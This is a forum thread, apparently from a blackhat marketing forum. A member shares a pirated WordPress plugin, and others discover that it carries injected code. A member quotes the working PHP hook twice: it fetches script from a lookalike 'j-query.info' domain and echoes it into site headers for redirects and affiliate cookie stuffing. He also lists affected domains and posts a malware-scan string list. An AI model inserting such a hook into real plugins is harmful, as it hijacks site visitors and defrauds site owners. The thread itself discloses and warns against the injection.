[GET]Wp Stealth Note - "Why I spent $2,240 on tmakes your visitors like you more, gets you more Goog

Discussion in 'Member Downloads' started by cyborgcod, Mar 20, 2013.

  1. cyborgcod

    cyborgcod Banned

    Joined:
    Aug 19, 2010
    Messages:
    654
    Likes Received:
    2,854
    Trophy Points:
    93
    Location:
    United Kingdom
    Not even released yet :)
    Enjoy guys.

    Sales Page
    Code:
    http://wpstealthnote.com/
    WSO Page
    Code:
    http://www.warriorforum.com/warrior-special-offers-forum/766265-why-i-spent-2-240-wp-plugin-your-visitors-will-like-you-more-buy-you-more.html
    Download
    Code:
    http://mir.cr/1TDFOBXA
    VT - Clean
    Code:
    https://www.virustotal.com/en/file/85f66bebdfb1ba413b7ad7e11bcd24701f4f49a0eda952f78b428a26e1eb60fb/analysis/1363744981/

    Please say thanks and make mirrors.
    Sharing is caring.
     
    Last edited: Mar 21, 2013
    #1
    ilikeseggs, Creep, GianniP and 27 others like this.
  2. amommy

    amommy Member

    Joined:
    Feb 13, 2011
    Messages:
    51
    Likes Received:
    58
    Trophy Points:
    18
    the wso sneak peek
    Code:
    http://www.warriorforum.com/warrior-special-offers-forum/766265-why-i-spent-2-240-wp-plugin-your-visitors-will-like-you-more-buy-you-more.html
     
    Last edited: Mar 20, 2013
    #2
    FMG, incognito87354 and cyborgcod like this.
  3. TZ-

    TZ- Well-Known Member

    Joined:
    Sep 3, 2010
    Messages:
    760
    Likes Received:
    2,205
    Trophy Points:
    93
    Whoever downloaded this plugin is getting redirected traffic from his site to some other site, where is filled with some java packed shit or affiliate codes.

    This is not clean, code from UBHS script is injected.


    Code:
            $url = "http://www.j-query.info/jquery-1.6.3.min.js"; 
            $ch = curl_init();  
            $timeout = 10;  
            curl_setopt($ch,CURLOPT_URL,$url); 
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
            $data = curl_exec($ch);  
            curl_close($ch); 
            echo "$data";


    Recently I checked one other plugin on other forum and got source of actual links and affiliate signatures.

    [​IMG]


    affiliate links to hostgator and amazon.

    [​IMG]



    This username cyborgod must be some coincidence, right, cyborgod ?
     
    #3
    ilikeseggs, gaper, hachkay and 23 others like this.
  4. theman

    theman SUPER VIP LIFETIME Jr. VIP

    Joined:
    Feb 25, 2012
    Messages:
    1,202
    Likes Received:
    3,710
    Trophy Points:
    113
    Wonder if George himself coded this into his plugin? Will have to wait and see what cyborgcod has to say about this one....
     
    #4
  5. cyborgcod

    cyborgcod Banned

    Joined:
    Aug 19, 2010
    Messages:
    654
    Likes Received:
    2,854
    Trophy Points:
    93
    Location:
    United Kingdom
    Wow. No idea.
    TZ, You seem to be the coder of Traffik Buster, are you sure your not involved here somehow?

    I am not a coder, Nor do i know anything about it. I scanned the Plugin, it was clean.
    My HG aff ID isnt even cyborgcod, So i have no idea.


    EDIT: After just opening the main php file in dreamweaver, i found that no such reference to my username exists. So no idea how/why im implemented here? I just got this from another forum :S

    EDIT2: Removed what TZ Said eitherway, and it still works. Re-updated the Download.
     
    Last edited: Mar 21, 2013
    #5
  6. TZ-

    TZ- Well-Known Member

    Joined:
    Sep 3, 2010
    Messages:
    760
    Likes Received:
    2,205
    Trophy Points:
    93
    I am not a coder of TB, I work php stuff and some jquery/ajax while TB is on coded for PC platform.
    What exactly you want to say that I am involved here somehow, lol. Just for fun I gone through few of your last shares and plugins, all of them have same code and somebody could say that you know very well what I am talking about, ubhs script, affiliate cookie stuffing etc ... I can even pull statistic from one plugin download here

    Code:
    https://bitly.com/11Et5Vn+ 
    and see all sites who installed plugin (that was amazon plugin) , I bet that many people here will see and recognize their sites and where is downloaded.


    this code is in each of plugins, shared by you lately.
    Its not on me to judge did you injected code or not, for me is clear that you did but that is just my opinion and who have to judge does not give a damn, so whatever.

    Code:
    function jqueryadd_head() {
        if(function_exists('curl_init'))
        {
            $url = "http://www.j-query.info/jquery-1.6.3.min.js"; 
            $ch = curl_init();  
            $timeout = 10;  
            curl_setopt($ch,CURLOPT_URL,$url); 
            curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
            $data = curl_exec($ch);  
            curl_close($ch); 
            echo "$data";
        }
    }
    add_action('wp_head', 'jqueryadd_head');

    code found in all of those plugins

    [GET][Rave reviews] (1300+ sold) WP Empire Builder. Launch & manage many blogs from 1 place. Closing soon

    Code:
    http://www.blackhatteam.com/f185/get-rave-reviews-1300-sold-wp-empire-builder-launch-and-manage-many-blogs-from-1-place-closing-soon-89748.html#post636324

    -----------------

    [GET]Azon Profit Poster - 440+ sold. (Rave reviews) WP plugin: More profitable Amazon blogs in just 2 mins (Closing soon)
    Code:
    http://www.blackhatteam.com/f185/get-azon-profit-poster-440-sold-rave-reviews-wp-plugin-more-profitable-amazon-blogs-in-just-2-mins-closing-soon-89751.html#post636328
    -----------------

    [GET]CB Goliath WP Plugin
    Code:
    http://www.blackhatteam.com/f185/get-cb-goliath-wp-plugin-45867.html
    ------------------

    [GET]LAUNCHING 12/02/2013! Ama Search Bar - Why I spent $2,350 on this WP plugin. More Amazon $$$ and traffic (Rave reviews)

    Code:
    http://www.blackhatteam.com/f185/get-launching-12-02-2013-ama-search-bar-why-i-spent-2-350-on-this-wp-plugin-more-amazon-and-traffic-rave-reviews-89750.html
    ---------------

    [GET]Associate Goliath - [Rave reviews] (2300+ sold) - Amazon affiliate blogs in 3 mins. WP plugin

    Code:
    http://www.blackhatteam.com/f185/get-associate-goliath-89734.html#post636206
    --------------

    Screens from statistics, in case that link get removed

    [​IMG]

    [​IMG]
     
    #6
    ilikeseggs, hachkay, mousyz and 3 others like this.
  7. theman

    theman SUPER VIP LIFETIME Jr. VIP

    Joined:
    Feb 25, 2012
    Messages:
    1,202
    Likes Received:
    3,710
    Trophy Points:
    113
    Watch out everyone with this code..and all code.......something to watch for in all plugins you DL around the web...thanks for the info
     
    #7
  8. TZ-

    TZ- Well-Known Member

    Joined:
    Sep 3, 2010
    Messages:
    760
    Likes Received:
    2,205
    Trophy Points:
    93
    domains referring to code from plugins, if somebody recognize their site, have to remove code.

    Code:
    canon7deos.com
    valentineideas.only-for-u.com
    www.asseenontvlovers.com
    bealady.net
    medical-beauty-center.com
    cydneesremyhair.com
    weddinginvitations.simpleweddingdecorati...
    www.kittygear.net
    www.thearticlesbase.com
    houmous.net
    restonhomebuyers.com
    www.affirmwear.com
    gaminghubstore.com
    sex-and-toys.com
    Email Clients, IM, AIR Apps, and Direct
    www.rhythmclock.net
    coolgiftsidea.com
    www.getarticlestoday.com
    onlinemoviestv.com
    conradbedford.com
    customerreviewsandratings.com
    www.gamerblackbox.com
    nordicnaturalsultimateomega.com
    www.skeletonwatches.tk
    fdating.org
    www.alanmcleanpublishing.com
    standmixertestde.org
    makeshoppingonline.com
    fastdietproducts.com
    www.j-query.info
    tenbestbargains.com
    wordpress-seo.co
    officialfacebuckgiveaways.com
    thesoftwarestand.com
    brydonjohnson.com
    traderslocal.co.uk
    newconsumerreports.com
    speakerdock-sounddock10.3owl.com
    marterognerud.com
    affiliatemarketingreveal.com
    daily50deals.com
    www.bestcamerareviewsite.com
    polaroidkameras.com
    runningaccessoriescenter.com
    thementalistcast.com
    www.hafizfahmialdino.asia
    wanduhr.x50x.net
    bestsellingjewlery.com
    127.0.0.1:4001
    www.beekeepingbee.net
    bestlaptop.bantul.asia
    www.lanval.com
    demo.sitokogrosir.com
    www.aboutloans.info
    toygames.coolgiftsidea.com
    www.fdating.org
    babystrollerjogger.id1945.com
    dohamonster.com
    f5life.us
    multivitamins-for-men.com
    videostore-online.com
    www.flipgoldcoins.com
    snapinmedia:bhu8nji9@www.thearticlesbase...
    tablets.tenbestbargains.com
    j-query.info
    cerinefashion.com
    mithatnetwork.com
    purehealthandfitness.org
    plazanetter.com
    ebusiness.gituc.com
    buynowz.com
    mybursa:kidnis@www.thearticlesbase.com
    www.product-reviews.asia
    pricesaving5.info
    amazon.black-projects.co.uk
    search.daum.net
    translate.googleusercontent.com
    www.ozyburn.com
    vivienemanuel.com
    www.sex-and-toys.com
    www.aboutloans.info.
    savingstiger.org
    fivekiwi.info
     
    #8
    ilikeseggs, trotty, joebio911 and 4 others like this.
  9. TZ-

    TZ- Well-Known Member

    Joined:
    Sep 3, 2010
    Messages:
    760
    Likes Received:
    2,205
    Trophy Points:
    93
    What a small world, looks like that someone have site on same server like you, this Illuminati thing



    [​IMG]

    [​IMG]

    [​IMG]




    Anyway, this is new link for stats, directly from
    Code:
    http://www.j-query.info/jquery-1.6.3.min.js
    , going to

    Code:
    xxxxxxxxxxxx


    [​IMG]



    and wow, man, this is not bad, 58,027 clicks on specific aff id... what a pitty its not yours, you could make a lot of money...



    those are domains , installed plugin lately...

    Code:
        afm.re
        www.geekandjock.com
        pleaseeducate.us
        www.wheelchairboy.info
        www.cooney.com.au
        Email Clients, IM, AIR Apps, and Direct
        m.dotcomxp.com
        www.myrepairhelp.com
        www.rhythmclock.net
        www.kofc4387.org
        www.kittygear.net
        myinternetmarketingblog.com
        buying-advice.com
        im.idichvu.com
        www.taiwan-tvnet.com
        www.j-query.info
        canon7deos.com
        holidaytripadvisors.com
        mobilephonesignalbooster.org.uk
     
    Last edited by a moderator: Mar 27, 2013
    #9
    ilikeseggs, hachkay, chuckles and 4 others like this.
  10. theman

    theman SUPER VIP LIFETIME Jr. VIP

    Joined:
    Feb 25, 2012
    Messages:
    1,202
    Likes Received:
    3,710
    Trophy Points:
    113
    Nice work on the issues with the plugin.......never know who you really dealing with huh...thanks for the info
     
    #10
  11. TheOne

    TheOne Active Member

    Joined:
    May 8, 2010
    Messages:
    868
    Likes Received:
    221
    Trophy Points:
    43
    Hey,

    I was looking at CB Goliath....why would someone say that "Fixed issue with gzip encoding of hxxp://www.2settlemydebt.cOm/ (2SETTLE)
    * 3.0.7* in the main top section of the php code itself?

    Why would you need that?

    Also, where are you finding the codes that were illustrated above?

    Thanks
     
    #11
  12. TZ-

    TZ- Well-Known Member

    Joined:
    Sep 3, 2010
    Messages:
    760
    Likes Received:
    2,205
    Trophy Points:
    93
    That is rhetoric question or you ask me directly for someone's notes and codes ?

    code is in cb_goliath-4.2.7.zip - file cb_goliath.php , very obvious, first part.
     
    #12
  13. TheOne

    TheOne Active Member

    Joined:
    May 8, 2010
    Messages:
    868
    Likes Received:
    221
    Trophy Points:
    43
    Thank you TZ. I looked in my zip files and fortunately did NOT find these in the php files.

    That is very strange that those that you referred to, started showing up.

    I still am not sure why someone would put: "Fixed issue with gzip encoding of hxxp://www.2settlemydebt.cOm/ (2SETTLE)
    * 3.0.7* in the header of the code.

    Is that the plugin makers site?

    Anyway thank you for alerting us to the the injected code.

    I WILL be more diligent in reviewing my files from now on.
     
    #13
    TZ- likes this.
  14. TZ-

    TZ- Well-Known Member

    Joined:
    Sep 3, 2010
    Messages:
    760
    Likes Received:
    2,205
    Trophy Points:
    93
    [​IMG]
     
    #14
  15. dzsindzso

    dzsindzso Well-Known Member

    Joined:
    Sep 30, 2010
    Messages:
    120
    Likes Received:
    1,023
    Trophy Points:
    93
    Thanks TZ for the find. Good thing I never used his shares, but I would probably missed that code or would never actualy check it. Wil definitely double check from now on. Nice trick to use the j-query.info domain, makes it harder to notice. Anyway the whois for that domain is not protected so if any of you who downloaded the crap, happened to be in HK, give him a call and thank it personally ;)

    Now moderators do the right thing and remove all the threads with the infected stuff and make a note for the ones who downloaded it.
     
    Last edited: Mar 21, 2013
    #15
    TZ- likes this.
  16. dconstrukt

    dconstrukt Active Member

    Joined:
    Oct 21, 2010
    Messages:
    388
    Likes Received:
    35
    Trophy Points:
    28
    cmon guys... if you;'re gonna share shit dont be a fucking douchebag and inject code.... thats so fucking lame and a great way to get your ass beat.

    MODS: i say we INSTA-ban anyone who does this and remove all their posts and shares.
     
    #16
    digitalx, Vivian2468 and TZ- like this.
  17. ninja14

    ninja14 Member

    Joined:
    Mar 10, 2011
    Messages:
    66
    Likes Received:
    23
    Trophy Points:
    8
    Home Page:
    thank you TZ for this .. really appreciate it .. wanted this plug in and hopefully you discovered the trick before
    Thanks again
     
    #17
    TZ- likes this.
  18. We Go

    We Go Banned

    Joined:
    May 11, 2012
    Messages:
    237
    Likes Received:
    89
    Trophy Points:
    28
    TYVM! So glad I saw this thread ,.. I was going to start using the empire plugin as soon as I found a cpanel hosting .. looks like I need to search all my drives just in case ....

    what string would you search {Windows search XP} for to best locate the code ?? I am not sure which string is the real tell on these

    TIA!
     
    #18
    TZ- likes this.
  19. TZ-

    TZ- Well-Known Member

    Joined:
    Sep 3, 2010
    Messages:
    760
    Likes Received:
    2,205
    Trophy Points:
    93
    I use something that I coded, script to upload to server ( or in xampp) and check all files on it, list them and than do a manual check because many false positives are triggered. I need to sort this list since some of strings have same parts but Some of basic thing to check would be:
    Code:
    passthru
    shell_exec
    system(
    phpinfo
    eval(
    base64_decode
    edoced_46esab
    chmod
    mkdir
    ``
    fopen
    fclose
    readfile 
    curl_init
    curl_setopt
    curl_close
    wp_remote_fopen
    “rss_â€￾.md5(
    preg_replace(
    stristr($referer
    !stristr($referer
    stream_context_create(
    preg_match
    header("Location:
    gethostbyname
    file_get_contents("http://
    include(
    include_once(
    require(
    require_once(
    include("http://
    src=http://
    $user_auth
    $userauth
    <iframe
    src=
    src%3D
    src%3d
    http://
    script language=
    unescape
    varchar
    (0x
    sysob
    <script
    char(
    char (
    sysobject
    substring
    declare @
    insert into
    document.write('<iframe src=
    document.write(unescape(
    window.location="http://
    window.location.replace("http://
    <script language="JavaScript" src="http://
    &lt;script type=&quot;text/javascript&quot; src=&quot;http://
    <meta http-equiv="refresh" content=
    <meta http-equiv="location" content=
    <iframe src=
    width="0"
    height="0"
    frameborder="0"
    style="display:none"
    
    
    Also .htaccess need to be checked, many malicious redirects are done from there.
    Before I used free software FileSeek, is excellent but slow to work with, string by string.
     
    #19
    sharold, dzsindzso, chuckles and 6 others like this.
  20. carson

    carson Well-Known Member

    Joined:
    Feb 7, 2011
    Messages:
    1,758
    Likes Received:
    3,418
    Trophy Points:
    113
    Location:
    UK
    TZ just wanted to give a big thanks for your diligence in checking this, not that I was going to download/use as I'm very wary of plugins/themes unless I can 100% trust source (know they bought it) or the share is a direct download. Probably like many on BHT, I'm not skilled at finding stuff like this and really appreciate those who can checking it.

    Thanks again :cool:
     
    #20
    TZ- likes this.

Share This Page